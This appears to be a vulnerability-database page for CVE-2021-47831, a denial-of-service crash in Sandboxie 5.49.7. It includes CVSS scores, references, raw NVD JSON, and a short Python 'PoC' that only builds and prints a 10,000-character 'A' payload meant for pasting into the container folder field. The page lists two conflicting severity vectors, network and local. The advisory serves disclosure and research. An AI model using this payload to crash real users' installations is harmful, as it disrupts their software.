CVE-2021-47831

Description

Sandboxie 5.49.7 contains a denial of service vulnerability that allows attackers to crash the application by overflowing the container folder input field. Attackers can paste a large buffer of repeated characters into the Sandbox container folder setting to trigger an application crash.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

Sandboxie < 5.49.7

Sandboxie 5.49.7（受影响版本）

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2021-47831 PoC - Sandboxie Buffer Overflow DoS
# This PoC demonstrates the buffer overflow vulnerability in Sandboxie container folder input
# Note: This is for educational and security research purposes only

import sys

def generate_poc_payload(length=10000):
    """
    Generate a large payload of repeated characters to trigger buffer overflow
    in Sandboxie container folder input field
    """
    return 'A' * length

def simulate_attack():
    """
    Simulate the attack process:
    1. Open Sandboxie settings
    2. Navigate to container folder setting
    3. Paste large buffer into input field
    4. Application crashes due to buffer overflow
    """
    payload = generate_poc_payload(10000)
    print(f"[+] Generated payload with {len(payload)} characters")
    print(f"[+] Payload preview: {payload[:100]}...")
    print("[+] Attack simulation complete")
    print("[-] Target application would crash due to buffer overflow")
    return payload

if __name__ == "__main__":
    print("CVE-2021-47831 Sandboxie Buffer Overflow PoC")
    print("=" * 50)
    simulate_attack()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2021-47831
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2021-47831
[3] CVE Details https://www.cvedetails.com/cve/CVE-2021-47831/
[4] VulDB https://vuldb.com/cve/CVE-2021-47831
[5] https://sandboxie-plus.com/
[6] https://www.exploit-db.com/exploits/49844
[7] https://www.vulncheck.com/advisories/sandboxie-denial-of-service
[8] https://www.exploit-db.com/exploits/49844

Raw JSON Data

JSON

{"cve": {"id": "CVE-2021-47831", "sourceIdentifier": "[email protected]", "published": "2026-01-16T19:16:08.240", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Sandboxie 5.49.7 contains a denial of service vulnerability that allows attackers to crash the application by overflowing the container folder input field. Attackers can paste a large buffer of repeated characters into the Sandbox container folder setting to trigger an application crash."}, {"lang": "es", "value": "Sandboxie 5.49.7 contiene una vulnerabilidad de denegación de servicio que permite a los atacantes provocar un fallo en la aplicación desbordando el campo de entrada de la carpeta del contenedor. Los atacantes pueden pegar un búfer grande de caracteres repetidos en la configuración de la carpeta del contenedor de la sandbox para provocar un fallo en la aplicación."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.6, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1284"}]}], "references": [{"url": "https://sandboxie-plus.com/", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/49844", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/sandboxie-denial-of-service", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/49844", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}